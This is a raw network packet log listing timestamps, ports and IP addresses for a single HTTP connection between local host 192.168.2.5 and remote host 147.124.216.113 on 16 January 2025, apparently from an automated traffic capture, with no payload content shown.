Jan 16, 2025 08:25:22.828097105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828134060 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828136921 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828202963 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828206062 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828237057 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828277111 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828296900 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828327894 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828362942 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828383923 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828399897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828452110 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828459024 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828485012 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828522921 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828548908 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828557014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828603983 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.828609943 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828641891 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828676939 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828708887 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829051971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829086065 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829108953 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829121113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829183102 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829279900 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829330921 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829365015 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829399109 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829417944 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829435110 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829458952 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829485893 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829523087 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829531908 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829572916 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829607964 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829621077 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829643011 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829678059 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829703093 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829711914 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829746008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829760075 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.829780102 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.829832077 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830123901 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830178022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830229044 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830231905 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830264091 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830297947 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830318928 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830351114 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830384016 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830408096 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830420971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830517054 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830549955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830570936 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830585003 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830612898 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830621004 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830662012 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830678940 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.830698013 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.830802917 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.831156015 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.831192017 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.831227064 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.831242085 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.831262112 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.831330061 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867082119 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867116928 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867170095 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867172956 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867203951 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867238998 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867281914 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867289066 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867345095 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867362022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867393017 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867475033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867510080 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867532969 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867563963 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867585897 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867603064 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867654085 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867656946 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867690086 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867723942 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867743015 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867758989 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867808104 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867834091 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867870092 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867902994 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867932081 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.867939949 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.867969990 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868011951 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868096113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868149996 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868174076 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868185997 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868240118 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868268967 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868273020 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868309021 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868360043 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868361950 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868393898 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868407011 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868428946 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868463993 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868518114 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868827105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868876934 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868887901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.868952990 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.868987083 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869010925 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869023085 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869056940 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869083881 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869092941 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869144917 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869154930 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869179964 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869214058 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869249105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869273901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869282007 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869308949 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869314909 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869350910 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869373083 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869771004 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869827032 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869863033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869875908 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869898081 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.869915962 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.869932890 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.870011091 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.870045900 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.912116051 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930139065 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930175066 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930228949 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930234909 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930263042 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930315018 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930349112 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930365086 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930385113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930419922 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930421114 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930454969 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930481911 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930489063 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930571079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930605888 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930608988 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930641890 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930655956 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930677891 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930726051 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930825949 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930859089 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930892944 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930922985 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.930927038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930959940 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930994987 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.930998087 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931035042 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931066990 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931068897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931103945 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931118965 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931138992 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931173086 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931185007 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931206942 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931261063 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931263924 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931294918 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931346893 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931355953 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931380987 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931415081 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931421995 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931448936 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931483984 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931508064 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931519985 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931554079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931586981 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931587934 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931655884 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931679964 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931746960 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931782007 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931802988 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931814909 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931850910 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931886911 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931886911 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931921959 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931945086 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.931955099 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.931991100 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932024956 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932049036 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.932058096 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932071924 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.932092905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932126999 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932153940 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.932159901 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932194948 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932219982 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.932228088 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932262897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932291985 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.932315111 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.932349920 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955105066 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955161095 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955194950 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955229044 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955231905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955266953 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955328941 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955368042 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955406904 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955440998 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955446005 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955499887 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955528975 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955563068 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955596924 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955631971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955661058 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955667019 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955701113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955702066 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955735922 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955787897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955822945 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955826998 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955853939 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955857038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955892086 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955929041 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955940962 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.955979109 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.955997944 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956032038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956069946 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956103086 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956104040 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956139088 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956175089 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956176996 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956274033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956295013 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956307888 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956341982 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956361055 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956376076 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956409931 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956440926 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956445932 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956484079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956518888 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956564903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956564903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956589937 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956701994 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956734896 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956763029 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956768990 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956806898 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956857920 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956892014 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956892967 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956918955 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956927061 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956960917 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.956986904 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.956995010 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957030058 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957062960 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957102060 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.957148075 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.957196951 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957231045 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957266092 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957292080 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.957317114 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957350969 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957386971 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957437992 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957473040 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957478046 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.957478046 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.957509041 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.957560062 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003094912 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003164053 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003185987 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003201962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003254890 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003257036 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003290892 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003345966 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003391981 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003392935 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003446102 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003480911 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003484964 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003518105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003570080 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003571033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003602982 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003638029 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003638029 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003673077 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003688097 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:23.003704071 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003756046 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:23.003772020 CET	49711	80	192.168.2.5	147.124.216.113
